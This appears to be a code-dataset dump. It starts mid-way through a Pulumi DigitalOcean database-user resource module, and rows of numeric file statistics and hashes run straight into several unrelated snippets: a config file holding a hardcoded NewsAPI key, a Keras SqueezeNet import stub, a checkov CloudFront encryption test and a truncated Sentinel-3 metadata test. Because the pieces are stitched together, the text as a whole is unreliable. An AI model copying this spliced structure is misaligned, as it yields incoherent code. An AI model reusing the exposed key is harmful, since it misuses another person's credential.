> **NOTE:** Any new users created will always have `normal` role, only the default user that comes with database cluster creation has `primary` role. Additional permissions must be managed manually.
## Example Usage
### Create a new PostgreSQL database user
```python
import pulumi
import pulumi_digitalocean as digitalocean
postgres_example = digitalocean.DatabaseCluster("postgres-example",
engine="pg",
version="11",
size="db-s-1vcpu-1gb",
region="nyc1",
node_count=1)
user_example = digitalocean.DatabaseUser("user-example", cluster_id=postgres_example.id)
```
## Import
Database user can be imported using the `id` of the source database cluster and the `name` of the user joined with a comma. For example
```sh
$ pulumi import digitalocean:index/databaseUser:DatabaseUser user-example 245bcfd0-7f31-4ce6-a2bc-475a116cca97,foobar
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
:param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
:param pulumi.Input[str] name: The name for the database user.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DatabaseUserArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a DigitalOcean database user resource. When creating a new database cluster, a default admin user with name `doadmin` will be created. Then, this resource can be used to provide additional normal users inside the cluster.
> **NOTE:** Any new users created will always have `normal` role, only the default user that comes with database cluster creation has `primary` role. Additional permissions must be managed manually.
## Example Usage
### Create a new PostgreSQL database user
```python
import pulumi
import pulumi_digitalocean as digitalocean
postgres_example = digitalocean.DatabaseCluster("postgres-example",
engine="pg",
version="11",
size="db-s-1vcpu-1gb",
region="nyc1",
node_count=1)
user_example = digitalocean.DatabaseUser("user-example", cluster_id=postgres_example.id)
```
## Import
Database user can be imported using the `id` of the source database cluster and the `name` of the user joined with a comma. For example
```sh
$ pulumi import digitalocean:index/databaseUser:DatabaseUser user-example 245bcfd0-7f31-4ce6-a2bc-475a116cca97,foobar
```
:param str resource_name: The name of the resource.
:param DatabaseUserArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DatabaseUserArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DatabaseUserArgs.__new__(DatabaseUserArgs)
if cluster_id is None and not opts.urn:
raise TypeError("Missing required property 'cluster_id'")
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["mysql_auth_plugin"] = mysql_auth_plugin
__props__.__dict__["name"] = name
__props__.__dict__["password"] = None
__props__.__dict__["role"] = None
super(DatabaseUser, __self__).__init__(
'digitalocean:index/databaseUser:DatabaseUser',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None) -> 'DatabaseUser':
"""
Get an existing DatabaseUser resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
:param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
:param pulumi.Input[str] name: The name for the database user.
:param pulumi.Input[str] password: Password for the database user.
:param pulumi.Input[str] role: Role for the database user. The value will be either "primary" or "normal".
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DatabaseUserState.__new__(_DatabaseUserState)
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["mysql_auth_plugin"] = mysql_auth_plugin
__props__.__dict__["name"] = name
__props__.__dict__["password"] = password
__props__.__dict__["role"] = role
return DatabaseUser(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[str]:
"""
The ID of the original source database cluster.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="mysqlAuthPlugin")
def mysql_auth_plugin(self) -> pulumi.Output[Optional[str]]:
"""
The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
"""
return pulumi.get(self, "mysql_auth_plugin")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name for the database user.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def password(self) -> pulumi.Output[str]:
"""
Password for the database user.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
Role for the database user. The value will be either "primary" or "normal".
"""
return pulumi.get(self, "role")
| 42.676218
| 238
| 0.647442
| 1,795
| 14,894
| 5.154318
| 0.113092
| 0.065391
| 0.080199
| 0.076092
| 0.801016
| 0.776048
| 0.750324
| 0.741786
| 0.736273
| 0.720601
| 0
| 0.005055
| 0.256143
| 14,894
| 348
| 239
| 42.798851
| 0.830039
| 0.398818
| 0
| 0.603352
| 1
| 0
| 0.0874
| 0.005478
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156425
| false
| 0.078212
| 0.027933
| 0
| 0.27933
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
edaa11d57bfaf094ff23baa1f233866f428abf23
| 48
|
py
|
Python
|
static/news_ETL/config.py
|
DutchDS/Project-2
|
ca9378ac797b8e29b655453f95553f54858b7bb8
|
[
"MIT"
] | null | null | null |
static/news_ETL/config.py
|
DutchDS/Project-2
|
ca9378ac797b8e29b655453f95553f54858b7bb8
|
[
"MIT"
] | 4
|
2020-02-25T02:49:55.000Z
|
2020-02-29T19:43:35.000Z
|
static/news_ETL/config.py
|
DutchDS/Project-2
|
ca9378ac797b8e29b655453f95553f54858b7bb8
|
[
"MIT"
] | 1
|
2020-06-06T02:02:22.000Z
|
2020-06-06T02:02:22.000Z
|
newsapi_key = '17189260d63f458ca3a7b53161be8b0a'
| 48
| 48
| 0.895833
| 3
| 48
| 14
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.478261
| 0.041667
| 48
| 1
| 48
| 48
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0.653061
| 0.653061
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
edd7304526d3db19ec9bc2c17540c5223a16d11f
| 47
|
py
|
Python
|
at_learner_core/at_learner_core/models/model.py
|
hieuvecto/CASIA-SURF_CeFA
|
71dfd846ce968b3ed26974392a6e0c9b40aa12ae
|
[
"MIT"
] | 133
|
2020-03-03T03:58:04.000Z
|
2022-03-28T21:42:36.000Z
|
at_learner_core/at_learner_core/models/model.py
|
lucaslu1987/CASIA-SURF_CeFA
|
205d3d976523ed0c15d1e709ed7f21d50d7cf19b
|
[
"MIT"
] | 24
|
2020-03-13T09:30:09.000Z
|
2022-03-22T07:47:15.000Z
|
at_learner_core/at_learner_core/models/model.py
|
lucaslu1987/CASIA-SURF_CeFA
|
205d3d976523ed0c15d1e709ed7f21d50d7cf19b
|
[
"MIT"
] | 29
|
2020-03-10T06:46:45.000Z
|
2022-01-29T15:35:21.000Z
|
'''
TODO:
def get_wrapper
def get_optimizer
'''
| 9.4
| 17
| 0.723404
| 7
| 47
| 4.571429
| 0.714286
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 47
| 5
| 18
| 9.4
| 0.780488
| 0.829787
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.2
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edee871f34d10808eb554478e4bd88d16fa0762b
| 100
|
py
|
Python
|
keras_squeezenet/__init__.py
|
zr71516/squeezeNet
|
e54c681ea573092d54557fe09c9d492fcd0cfa2c
|
[
"MIT"
] | 430
|
2016-11-09T03:36:23.000Z
|
2022-03-19T09:56:35.000Z
|
keras_squeezenet/__init__.py
|
zr71516/squeezeNet
|
e54c681ea573092d54557fe09c9d492fcd0cfa2c
|
[
"MIT"
] | 21
|
2016-11-14T00:57:27.000Z
|
2021-03-19T22:43:05.000Z
|
keras_squeezenet/__init__.py
|
zr71516/squeezeNet
|
e54c681ea573092d54557fe09c9d492fcd0cfa2c
|
[
"MIT"
] | 184
|
2016-10-30T12:51:55.000Z
|
2022-02-20T15:19:28.000Z
|
from keras_squeezenet.squeezenet import SqueezeNet
from keras_squeezenet.version import __version__
| 33.333333
| 50
| 0.9
| 12
| 100
| 7
| 0.416667
| 0.214286
| 0.452381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 51
| 50
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b64d673a9075a980eb8a317c3e54a31a2578b951
| 5,302
|
py
|
Python
|
tests/terraform/checks/resource/aws/test_CloudfrontDistributionEncryption.py
|
fossabot/checkov
|
d09938cffe3588dd1f472bcf2382e07fa7f9010b
|
[
"Apache-2.0"
] | null | null | null |
tests/terraform/checks/resource/aws/test_CloudfrontDistributionEncryption.py
|
fossabot/checkov
|
d09938cffe3588dd1f472bcf2382e07fa7f9010b
|
[
"Apache-2.0"
] | null | null | null |
tests/terraform/checks/resource/aws/test_CloudfrontDistributionEncryption.py
|
fossabot/checkov
|
d09938cffe3588dd1f472bcf2382e07fa7f9010b
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from checkov.terraform.checks.resource.aws.CloudfrontDistributionEncryption import check
from checkov.terraform.models.enums import CheckResult
class TestCloudfrontDistributionEncryption(unittest.TestCase):
def test_failure(self):
resource_conf = {'origin': [
{'domain_name': ['${aws_s3_bucket.b.bucket_regional_domain_name}'], 'origin_id': ['${local.s3_origin_id}'],
's3_origin_config': [{'origin_access_identity': ['origin-access-identity/cloudfront/ABCDEFG1234567']}]}],
'enabled': [True], 'is_ipv6_enabled': [True], 'comment': ['Some comment'],
'default_root_object': ['index.html'], 'logging_config': [
{'include_cookies': [False], 'bucket': ['mylogs.s3.amazonaws.com'], 'prefix': ['myprefix']}],
'aliases': [['mysite.example.com', 'yoursite.example.com']], 'ordered_cache_behavior': [
{'path_pattern': ['/content/immutable/*'], 'allowed_methods': [['GET', 'HEAD', 'OPTIONS']],
'cached_methods': [['GET', 'HEAD', 'OPTIONS']], 'target_origin_id': ['${local.s3_origin_id}'],
'forwarded_values': [
{'query_string': [False], 'headers': [['Origin']], 'cookies': [{'forward': ['none']}]}],
'min_ttl': [0], 'default_ttl': [86400], 'max_ttl': [31536000], 'compress': [True],
'viewer_protocol_policy': ['redirect-to-https']},
{'path_pattern': ['/content/*'], 'allowed_methods': [['GET', 'HEAD', 'OPTIONS']],
'cached_methods': [['GET', 'HEAD']], 'target_origin_id': ['${local.s3_origin_id}'],
'forwarded_values': [{'query_string': [False], 'cookies': [{'forward': ['none']}]}], 'min_ttl': [0],
'default_ttl': [3600], 'max_ttl': [86400], 'compress': [True],
'viewer_protocol_policy': ['redirect-to-https']}], 'price_class': ['PriceClass_200'], 'restrictions': [
{'geo_restriction': [{'restriction_type': ['whitelist'], 'locations': [['US', 'CA', 'GB', 'DE']]}]}],
'viewer_certificate': [{'cloudfront_default_certificate': [True]}], 'default_cache_behavior': [
{'allowed_methods': [['DELETE', 'GET', 'HEAD', 'OPTIONS', 'PATCH', 'POST', 'PUT']],
'cached_methods': [['GET', 'HEAD']], 'target_origin_id': ['${local.s3_origin_id}'],
'forwarded_values': [{'query_string': [False], 'cookies': [{'forward': ['none']}]}],
'viewer_protocol_policy': ['allow-all'], 'min_ttl': [0], 'default_ttl': [3600], 'max_ttl': [86400]}]}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
resource_conf = {'origin': [
{'domain_name': ['${aws_s3_bucket.b.bucket_regional_domain_name}'], 'origin_id': ['${local.s3_origin_id}'],
's3_origin_config': [{'origin_access_identity': ['origin-access-identity/cloudfront/ABCDEFG1234567']}]}],
'enabled': [True], 'is_ipv6_enabled': [True], 'comment': ['Some comment'],
'default_root_object': ['index.html'], 'logging_config': [
{'include_cookies': [False], 'bucket': ['mylogs.s3.amazonaws.com'], 'prefix': ['myprefix']}],
'aliases': [['mysite.example.com', 'yoursite.example.com']], 'ordered_cache_behavior': [
{'path_pattern': ['/content/immutable/*'], 'allowed_methods': [['GET', 'HEAD', 'OPTIONS']],
'cached_methods': [['GET', 'HEAD', 'OPTIONS']], 'target_origin_id': ['${local.s3_origin_id}'],
'forwarded_values': [
{'query_string': [False], 'headers': [['Origin']], 'cookies': [{'forward': ['none']}]}],
'min_ttl': [0], 'default_ttl': [86400], 'max_ttl': [31536000], 'compress': [True],
'viewer_protocol_policy': ['redirect-to-https']},
{'path_pattern': ['/content/*'], 'allowed_methods': [['GET', 'HEAD', 'OPTIONS']],
'cached_methods': [['GET', 'HEAD']], 'target_origin_id': ['${local.s3_origin_id}'],
'forwarded_values': [{'query_string': [False], 'cookies': [{'forward': ['none']}]}], 'min_ttl': [0],
'default_ttl': [3600], 'max_ttl': [86400], 'compress': [True],
'viewer_protocol_policy': ['redirect-to-https']}], 'price_class': ['PriceClass_200'], 'restrictions': [
{'geo_restriction': [{'restriction_type': ['whitelist'], 'locations': [['US', 'CA', 'GB', 'DE']]}]}],
'viewer_certificate': [{'cloudfront_default_certificate': [True]}], 'default_cache_behavior': [
{'allowed_methods': [['DELETE', 'GET', 'HEAD', 'OPTIONS', 'PATCH', 'POST', 'PUT']],
'cached_methods': [['GET', 'HEAD']], 'target_origin_id': ['${local.s3_origin_id}'],
'forwarded_values': [{'query_string': [False], 'cookies': [{'forward': ['none']}]}],
'viewer_protocol_policy': ['redirect-to-https'], 'min_ttl': [0], 'default_ttl': [3600],
'max_ttl': [86400]}]}
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
if __name__ == '__main__':
unittest.main()
| 76.84058
| 120
| 0.571482
| 514
| 5,302
| 5.575875
| 0.237354
| 0.044662
| 0.048849
| 0.04187
| 0.899163
| 0.899163
| 0.893929
| 0.893929
| 0.893929
| 0.893929
| 0
| 0.024791
| 0.208789
| 5,302
| 68
| 121
| 77.970588
| 0.658403
| 0
| 0
| 0.786885
| 0
| 0
| 0.471897
| 0.136929
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.032787
| false
| 0.016393
| 0.04918
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fcae2fea7c90f8e608262ad80e03fbd3dea0f22b
| 59,353
|
py
|
Python
|
tests/test_metadata.py
|
chorng/sentinel3
|
7d11f3ff1d001a239f0f14c36dfa3a6b597049ac
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metadata.py
|
chorng/sentinel3
|
7d11f3ff1d001a239f0f14c36dfa3a6b597049ac
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metadata.py
|
chorng/sentinel3
|
7d11f3ff1d001a239f0f14c36dfa3a6b597049ac
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import pystac
from pystac.extensions.eo import EOExtension
from pystac.extensions.projection import ProjectionExtension
from pystac.extensions.sat import SatExtension
from stactools.sentinel3.metadata_links import MetadataLinks
from stactools.sentinel3.product_metadata import ProductMetadata
from stactools.sentinel3.properties import (fill_eo_properties,
fill_proj_properties,
fill_sat_properties)
from tests import test_data
class Sentinel3OLCIMetadataTest(unittest.TestCase):
def test_parses_olci_1_efr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_OL_1_EFR____20210820T103153_20210820T103453_20210820T124206_"
"0179_075_222_2160_LN1_O_NR_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"brightPixels_percentage":
item.properties["s3:brightPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [-12.7336, 39.5443, 7.26622, 52.4486],
"epsg": 4326,
"datetime": "2021-08-20T10:33:22.751633Z",
"orbit_state": "descending",
"absolute_orbit": 28685,
"relative_orbit": 222,
"shape": [4865, 4090],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_1_EFR___",
"salineWaterPixels_percentage": 52.0,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 2.0,
"brightPixels_percentage": 45.0,
"invalidPixels_percentage": 4.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 23.0,
"saturatedPixels_percentage": 6e-06,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_1_err_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3B_OL_1_ERR____20210902T054142_20210902T062554_20210903T103126_"
"2652_056_262______LN1_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"brightPixels_percentage":
item.properties["s3:brightPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [-179.992, -64.7838, 177.69, 89.2419],
"epsg": 4326,
"datetime": "2021-09-02T06:03:47.955487Z",
"orbit_state": "ascending",
"absolute_orbit": 17474,
"relative_orbit": 262,
"shape": [1217, 15070],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_1_ERR___",
"salineWaterPixels_percentage": 64.0,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 1.0,
"tidalRegionPixels_percentage": 0.0,
"brightPixels_percentage": 37.0,
"invalidPixels_percentage": 3.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 0.0,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_2_lfr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_OL_2_LFR____20180105T002409_20180105T002540_20180106T053045_"
"0090_026_216_2069_LN1_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [140.405, 50.1222, 162.085, 57.9697],
"epsg": 4326,
"datetime": "2018-01-05T00:24:54.153465Z",
"orbit_state": "descending",
"absolute_orbit": 9814,
"relative_orbit": 216,
"cloud_cover": 71.0,
"shape": [4865, 2062],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_2_LFR___",
"salineWaterPixels_percentage": 13.0,
"coastalPixels_percentage": 0.002661,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 1.0,
"landPixels_percentage": 0.0,
"invalidPixels_percentage": 4.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 0.808174,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_2_lrr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3B_OL_2_LRR____20210902T054142_20210902T062554_20210903T103456_"
"2652_056_262______LN1_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [-179.992, -64.7838, 177.69, 89.2419],
"epsg": 4326,
"datetime": "2021-09-02T06:03:47.955487Z",
"orbit_state": "ascending",
"absolute_orbit": 17474,
"relative_orbit": 262,
"cloud_cover": 42.0,
"shape": [1217, 15070],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_2_LRR___",
"salineWaterPixels_percentage": 29.0,
"coastalPixels_percentage": 0.218855,
"freshInlandWaterPixels_percentage": 1.0,
"tidalRegionPixels_percentage": 0.0,
"landPixels_percentage": 24.0,
"invalidPixels_percentage": 3.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 0.0,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 0.0,
}
for k, v in expected.items():
